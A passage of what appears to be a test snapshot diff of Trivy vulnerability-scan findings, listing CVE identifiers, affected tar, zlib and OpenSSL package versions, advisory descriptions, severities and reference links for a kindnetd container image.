"https://access.redhat.com/security/cve/CVE-2021-20193", + "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "https://savannah.gnu.org/bugs/?59897", + "https://security.gentoo.org/glsa/202105-29", + "https://ubuntu.com/security/notices/USN-5329-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20193", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: Memory leak in read_header() in list.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/nvd/cve-2021-20193", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://access.redhat.com/security/cve/CVE-2021-20193", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://savannah.gnu.org/bugs/?59897", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://security.gentoo.org/glsa/202105-29", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://ubuntu.com/security/notices/USN-5329-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-1", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://github.com/curl/curl/issues/9271", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://support.apple.com/kb/HT213493", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://support.apple.com/kb/HT213494", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://ubuntu.com/security/notices/USN-5570-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://ubuntu.com/security/notices/USN-5570-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://ubuntu.com/security/notices/USN-5573-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://www.debian.org/security/2022/dsa-5218", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-1", + "packageName": "zlib1g", + "references": [ + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", + ], + }, + "category": "Vulnerability", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "references": [ { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - 